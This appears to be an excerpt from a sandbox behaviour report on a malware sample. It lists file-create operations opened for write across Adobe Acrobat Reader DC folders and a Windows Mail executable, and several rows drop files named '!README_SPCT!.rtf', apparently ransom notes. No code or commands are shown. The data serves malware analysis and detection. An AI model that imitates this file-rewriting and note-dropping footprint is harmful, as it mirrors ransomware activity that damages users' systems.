| Create | C:\Program Files\Windows Mail\wabmig.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CollectSignatures.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\cloud_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\warning.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Checkmark_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_Checkmark_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_AddBlue@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-57x57-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_AddBlue@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ind_prog.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check.cur | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-left.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check.cur | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\sample-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\Comb_field_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\hscroll-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\require.min.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\Handler@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\Handler@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
